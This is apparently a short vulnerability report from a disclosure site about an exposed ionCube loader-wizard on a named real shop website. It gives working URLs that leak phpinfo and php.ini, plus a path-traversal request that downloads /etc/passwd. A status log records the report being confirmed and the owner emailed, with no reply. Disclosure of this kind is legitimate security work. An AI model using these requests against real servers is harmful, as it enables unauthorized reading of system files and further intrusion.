Weakness about Web Server configuration

atlet.az 12 December 2016, 02:25

Detailed information

Attacker can get informations about phpinfo(), php.ini. Also have option to get any server files.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1

Detailed information: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/

Comments

  • 23 January 2017, 13:15
    Vulnerability status
    Have not any information from source

  • 15 December 2016, 11:46
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 14 December 2016, 13:25
    Added point to Vulnerability
    Moderator gave 7 point from 10 to vulnerability

  • 14 December 2016, 13:19
    Vulnerability status
    Confirmed by Moderator

  • 12 December 2016, 02:25
    Vulnerability added
    Vulnerability added to BUGemot